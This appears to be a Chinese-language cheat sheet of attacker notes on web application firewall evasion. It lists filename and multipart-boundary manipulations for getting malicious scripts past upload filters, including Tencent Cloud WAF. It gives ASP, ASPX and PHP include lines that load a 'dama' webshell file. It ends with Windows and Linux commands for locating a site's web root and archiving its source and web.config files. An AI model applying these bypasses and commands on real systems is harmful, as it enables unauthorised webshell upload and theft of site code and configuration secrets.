如果目标站点支持https尽量用https进行突破。
493waf
绕过文件名:应该是-的原因字数多了感觉像换行了,不行了试试别的特殊字符和组合
avvfe695d9d-2c30-4337-83b2-b4f6c7cb-b4f6c7cba925fe695d9d-2c30-4337-83b2-b4fe695d9d-2c30-4337-83b2-b4f6c7cba925fe695d9d-2c30-4337-83b2-b4f6c7cba925fe695d9d-2c30-4337-83b2-b4fe695d9d-2c30-4337.aspx
asp的就写入:
<!--#include file="dama.txt"-->
aspx的就写入:
<!--#include file="dama.txt"-->
php的就写入:
<?php require_once ("dama.txt"); ?>
Content-Encoding=deflate 绕过本地防火墙内容检测
腾讯云waf 上传绕过
boundary = 中间空格
boundary= 后面空格
1.文件名换行绕过:
2.filename == 绕过 (使用更多的等号也可以)
3.filename=; 绕过
4.使用垃圾字符填充文件名:
5.如果是aspx的话,
好像都不可行,但是可以变形下
filename=".jpg';filename=='.php"
filename="txt.asPx "
filename="txt.w\ar"
filename="poc:jpg?.a?.s?m?x"
Windows:
查找主站文件路径命令:
where /R D:\www\ /T "cccc.txt"
打包网站:
"C:\Program Files (x86)\WinRAR\Rar.exe" a -k -r -s -m1 F:\log\log.rar D:\PlatForm\web\
会打包 目录E:\wwwroot\ 下及子目录下所有以web开头.config结尾的文件。
可以执行 E:\RECYCLER\Rar.exe a -k -r -s -m1 E:\wwwroot\Web\web.rar E:\wwwroot\web*.config
linux
打包当前网站下所有jsp文件
find ./ -type f -name "*.jsp" | xargs tar zcvf kaka.tar
查找主站文件路径命令:
find / -type f -name "zhuazhanlog.gif"
打包网站
tar zcvf /tmp/test.tar.gz /home/wwwroot/test/*